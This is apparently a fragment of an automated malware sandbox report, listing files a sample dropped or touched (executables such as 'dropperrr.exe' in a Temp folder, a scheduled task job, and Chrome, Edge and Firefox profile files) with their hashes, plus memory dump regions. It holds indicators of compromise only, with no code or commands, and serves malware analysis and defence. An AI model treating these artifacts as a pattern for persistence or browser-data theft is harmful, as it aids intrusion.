SHA1 a3eddafaceddfd97d31e90917796b50fb39e66d7
SHA256 faf60e78c182143efce6de0ecc3c8c19a5307abf7720871d4b5b4e014d2a6df6
SHA512 e55cc89ec77a4cb83e6bef5ad420a38ba4c96fafc941293b9ced795f5895f2d9485be2bb9e224642fa968b02bb6735bc930152c512ef51dd1f3765dd23a9dfd1

C:\Users\Admin\AppData\Local\Temp\tmpE795.tmp

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

memory/3900-2622-0x0000000000220000-0x00000000006CA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 0eee464675ed147f0827306c499d1e05
SHA1 8180a20144a4aba51f84b14a507876d7a4c77fa2
SHA256 76751f6a6d2b9df7efb83a47d870cda73ba5539a2154e212077018de8531c221
SHA512 bd2d3b2ce0f4629116f7af29339cadb6712cef2fb9fdb54049d327eabc0ebd5c6fb90d8b4e0fd9e19ac56016fe452bf6e7b27dc56a9bce0ae6cab5b403729bad

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 806accae14805fed9d86ed4a2b6f1677
SHA1 df8b22c54b1fade5b55e492980946ec80419098a
SHA256 798c27cf9def79c64ba8df1d35a09f560b819a033c52d99d307fe03880ef769f
SHA512 6e339fad9e198820fde3a94afec6aa5bd6a956b73855fb2ce45b8d6276a39a586a17f082eb8f20ba982f328eea4864fc89b916ed08465aa36b1ad570afbb0916

memory/1832-2877-0x0000000000560000-0x0000000000A22000-memory.dmp

memory/6584-3210-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/6588-3213-0x0000000000560000-0x0000000000A22000-memory.dmp

memory/1832-3209-0x0000000000560000-0x0000000000A22000-memory.dmp

memory/6584-3215-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/6588-3217-0x0000000000560000-0x0000000000A22000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 c8e76d5a34066312e6fa3c9c515944c8
SHA1 268708cf5134758e91e7a7ba4fbaa52417c2136c
SHA256 3a0659f65cfa0249c61c5fac85b40cedce06d6d2213b82504b9dc2160be79baa
SHA512 4760bd7c8d537dfcfc5f42e089852bb5a157a740b9355b694d08b8e88ecbb8a010dc51158af7066c865f390c482dc37e058bbd952d04ec52e093410794cbf312

memory/3900-3223-0x0000000000220000-0x00000000006CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pureee.exe

MD5 0006ad7b9f2a9b304e5b3790f6f18807
SHA1 00db2c60fca8aec6b504dd8fd4861a2e59a21fe9
SHA256 014d6c58dd7459c1664196ccd49b796f861d7d7e7e6c573bbb9cdc7cadc21450
SHA512 31fcde22e25be698ef2efd44cc65b758e8c9e8b62504f3254f9cc44bfaabdaa0c94cefceac12833372f8b2797b6bd0205bb9c8f1626e25ee4117d886198fb7db

memory/6976-3235-0x0000026ADFA50000-0x0000026ADFAFA000-memory.dmp

memory/6976-3236-0x0000026AFA200000-0x0000026AFA30A000-memory.dmp

memory/6976-3286-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3284-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3282-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3280-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3278-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3276-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\adada.exe

MD5 9c682f5b5000cd003e76530706955a72
SHA1 1a69da76e05d114a317342dae3e9c7b10f107d43
SHA256 36e6a3dd4bfc86c4e707f43cd9515707442d6c424b7661cb41766cfdca322522
SHA512 33bd859542e1ae74d8c81427af44022cb91861dc02ee4202505f1e010487d06cb27e1aa83be6af17be4e2d8973289595b2ebe9bdf99a187956662df30b6dc88f

memory/6976-3274-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3272-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6864-4387-0x0000000000AA0000-0x0000000000DC4000-memory.dmp

memory/6976-3270-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

MD5 35e7f1f850ca524d0eaa6522a4451834
SHA1 e98db252a62c84fd87416d2ec347de46ec053ebd
SHA256 2449fe334bbf8f09ff80422578a6c6961d20a0a456b214f6490c5ed1ae859c9e
SHA512 3b013378a51a29652ff84f61050b344f504ef51a51944d469b1d0e629e4abad979416a56b9cffb6cfe20b80dfbebffec35dce6f5dc10b02907dee538f9f17a01

memory/6976-3268-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3267-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3264-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3262-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3260-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3258-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3256-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3254-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3252-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3250-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f35f9c67db84c73959e41005430647ca
SHA1 db674c89fff04a747d6ddfe406e0d14245cdbc57
SHA256 3efbf072e66320556fb8d30ecb39741769e2d3198424d5dfc302dbcbbaba9ace
SHA512 f6dbdbfe7183b957bb95b9fcc440104b7359213c8a681bb5e173761697d531d79c180463845748da82e55bfdfebe027c864b94add5571ed745b67a7ffd17a294

memory/6976-3248-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3246-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3244-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3242-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3240-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3238-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-3237-0x0000026AFA200000-0x0000026AFA305000-memory.dmp

memory/6976-7287-0x0000026ADFF30000-0x0000026ADFF86000-memory.dmp

memory/6976-7288-0x0000026ADFF90000-0x0000026ADFFDC000-memory.dmp

memory/7320-7289-0x000000001D1B0000-0x000000001D200000-memory.dmp

memory/7320-7290-0x000000001D6D0000-0x000000001D782000-memory.dmp

memory/7320-7298-0x000000001D500000-0x000000001D512000-memory.dmp

memory/7320-7299-0x000000001D560000-0x000000001D59C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2f8944a8ce96ca5be159ceb0f66bf27a
SHA1 ee0402012a08788ec2108454fb583d47b0553a2f
SHA256 205c7fabad4fa0823b3e807e238e903ff64d0a79de09358245fe53465e3b7bad
SHA512 8d67f1f72d9fc83a9f19dad73ab03540321124b3cac9343fc27f7a3ee39dc78c4dfda7de3fab63dabdd9fc100695d58c7b59ac013ef3793aad81f4cc43994b69

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 a551ba8afa731e7b1b5c281642165963
SHA1 bd00efe325e5a58c8de06b08359efa9bb1be33c6
SHA256 9771f4a628356d739a9d57eacaa442f58f06e16c6c698a8758aa812c258c1605
SHA512 7a328616c11f6d63a412f476b759ca311f605def72415c9d6d16a30a3a3426ae143be5f6ddb699d9035c7bdd3d8f586178a05336324df605718202679ce6b296

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8cb7d2a6ade0c8205a3db98f3a72cc27
SHA1 30e5a37438b1e55f2c5ffd09caf2a187c09a12a2
SHA256 87bff88a0e1c4870260afd353410de68e0f611d0373442c29583b3833fc9390b
SHA512 883ed30602994b7826e3ad59b7046226152acde26dd1fe5b2c08ac3bb1ace96af0684b58c91923e4b34cd350ab955f42ea3c23cacab62bffc5711c180865fc77

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 225f634799661a92b759c7cb706c33f7
SHA1 03b069cf22626b490eeb47311e60b4fc047b0e0e
SHA256 4be3406fce2e96efc8b362ecf563e2c08984ddd60754742d1ac77d444a3a6b39
SHA512 544d3e36ab50d43ad504c93ab71d05619f2eba30ab8ab0ba26cdc30fe2c7fb381379433ce603e6126e85ff269d22f49d92395ab79fa19dce0dc0fabdfd6cd64b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2061b02f46473bac3dc4f197beed1958
SHA1 8ba01abcae3db0b2492631f63688da2cd9642210
SHA256 8536790f45c77d08096dcf83a4adf45a89b60c0f04ea150fac4ecbc1c0562470
SHA512 2f59755bb955cd7c8d735654dacda65870a301c9c967637eb8ba7872839c6169ac0624d4b9f865a91158165b59440f0d17c3c6e21e4a7f3b3774971172c5fb30

memory/7612-7449-0x0000000000560000-0x0000000000A22000-memory.dmp

memory/7608-7450-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/7612-7453-0x0000000000560000-0x0000000000A22000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784

MD5 720c16d391ef70c6fe4742de4f2dae76
SHA1 89e1e7bcdbb8befea64211884e91f3f1d5ec3ade
SHA256 8d862f89114cdae890efecef58c12e3b46eaca6ffe9076c0bf35e70fe23110ce
SHA512 a5ab9f919af951d0fd05ae88188ec344ceb451e7568e1ebe8865482aeeeb7b94790b807250fc768dc5ab734c58794eae4a476edf64826c0b446a27f06e91ac76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784

MD5 44a17c6abfbf1bd2f3d39c0e44a166e4
SHA1 c3eca667e0a555c441f12b3e8315d79f5511709e
SHA256 84a98da603b8680a3927df7b9d7777910035640453b49a36108d7eaee2ae2986
SHA512 e6369ff7aa279c33a38d6cb1cb1174e82b807ac3296c4c49a127b6d5befad2280f891e9470072d0e0a3027db8963789305d6813260d630a5b90923f39937c124

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013

MD5 f1382455206b34aa38e2d8dd182fb525
SHA1 1a6a03acfd3dc66eae8e8d4ca47d07cda5cabf60
SHA256 18d04aad7e1875b8c0e8a77ced64abfa907a2cfe4d37d4ae79f25d1731bbd8e5
SHA512 edd7e0b5164be4df5c87b11e1e2bc8021bc1ba44cce39c828b6cd07fb1454772a1a8a1ed35c0068f4259ff62d1347344d3dc292b8b8470c50b38f18a35d29036

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013

MD5 9b1f0190b84a3a3ff7cdbcb6afdc3732
SHA1 3daa3676cf19ff9276a50442f8a3c2a3bc92bb78
SHA256 b6a9cee6e07d4efe1e6142a0391a15c41b3e1d30cd91d4e76928493ca3200e79
SHA512 dfcdb5730e674b3b27a42957f87e66b831c248f5a5a52dec472677db44f1c2b70ba48eebac1a0c82f51fe1cbfde21136d6429249c7aa51a1f1421e4d1e8cca51

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

MD5 c1657c09cbf653085fe5977265c03e1d
SHA1 304d2bd99d40aa426d2620893045e7c8805f3906
SHA256 3e9b4e775c00a2fd2b1db9d5c7b4e83d6df7f3683aaba7283a8137248dad751a
SHA512 73cb77912b1482f76e4b5a091dac1f83401673f64973e458ab0a8184aba41f3c0560950c26941ea952a02cf2cde9722de726313a8820fd5daa07e06c97344f4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

MD5 59c29597ffe187200d0926958403858a
SHA1 ec950c9a688f1de842f08809dc2a687f9dff52dc
SHA256 67ef6c4eb51417344dbb32014e263ffac7d4f12d72c0e0d11f5ab6f597ada6dd
SHA512 626a5d96163870847bae47102c466ceff4622aeb2a38851f90efe0eab7d5c4d9addab38991f26aa0a1a8a7a41caa8131b5fbbd8dfeb29ce127130d7a7dbc91af

C:\Windows\Installer\MSI61D.tmp

MD5 82d54afa53f6733d6529e4495700cdd8
SHA1 b3e578b9edde7aaaacca66169db4f251ee1f06b3
SHA256 8f4894b9d19bfe5d8e54b5e120cef6c69abea8958db066cdd4905cc78ecd58b6
SHA512 22476e0f001b6cf37d26e15dfb91c826c4197603ea6e1fbb9143c81392e41f18fa10a2d2d1e25425baaf754bff7fd179ef1df34966c10985e16d9da12a445150

C:\Windows\Installer\MSI65D.tmp

MD5 d53b2b818b8c6a2b2bae3a39e988af10
SHA1 ee57ec919035cf8125ee0f72bd84a8dd9e879959
SHA256 2a81878be73b5c1d7d02c6afc8a82336d11e5f8749eaacf54576638d81ded6e2
SHA512 3aaf8b993c0e8f8a833ef22ed7b106218c0f573dcd513c3609ead4daf90d37b7892d901a6881e1121f1900be3c4bbe9c556a52c41d4a4a5ec25c85db7f084d5e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7drp4u9j.default-release\datareporting\glean\db\data.safe.tmp

MD5 1f6d94ba2637b42ef68477c33359b8ba
SHA1 9952e146a7be42d43e82ab99b021ed1bf9d58409
SHA256 a6c73296d50476b5b35f3f01bf17547fe63279bf0f5123aa62b883933d59e10a
SHA512 fb9814a3f3fb7203c2a56463777fd747e5f50ffa5779e1b0245f9c2cf863d78e23942aa17d8024ba64961f94de08d0736bc384f2047884335aad9930bfe89ed9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 588c5082be344df0a891406e9f4eb9a3
SHA1 e0e9ac0c9202b83bcef7c49fde7c1a083721c102
SHA256 66a21f13a10e623a7bec79a7e40edcc6064f3aa8f57980ea725970ce15adfce3
SHA512 b43a090b47af0ac40c6fd4688a7b2ed246f11d37a279b854ecc62c44230b682871a169b6fb00af574c88a1f1926b86e19b4c85a01f0d922fbc20617b41b4ebcf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 799f22013c262f979217cd1b40516940
SHA1 c20082dc1c4e9cce62d5eba9440c6b92b9f3b929
SHA256 a9c14ce81fe3ffa91496f823156f2a94cde4ee1936b68968a2084143c06bb400
SHA512 28022ac607c9c3c56ca326802fc6c2c220fda3f2314b56816520468d4b6cc505c305aa78c057b654908707b292528f76545cf7dd906e24272a4ce6504146f205